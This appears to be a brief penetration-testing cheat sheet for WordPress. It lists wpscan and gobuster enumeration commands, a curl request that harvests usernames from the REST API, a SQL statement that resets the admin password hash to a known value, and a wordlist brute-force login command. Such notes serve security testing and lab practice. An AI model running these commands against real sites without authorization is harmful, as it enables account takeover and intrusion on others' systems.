Skip to content

Wordpress

Scan

General scan

wpscan --url $URL
wpscan --url $URL --api-token='...'

Enumeration

Enumeration directory

gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Enumerate plugins
wpscan --url http://$URL -e ap --plugins-detection aggressive
Enumeration users
wpscan --url $IP --enumerate u
curl $URL/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'

Other

Inject password 'hacker'

UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';
Bruteforce login
wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt
Search files that contain version
grep -R 5.9.2 /workspace/latest/source_code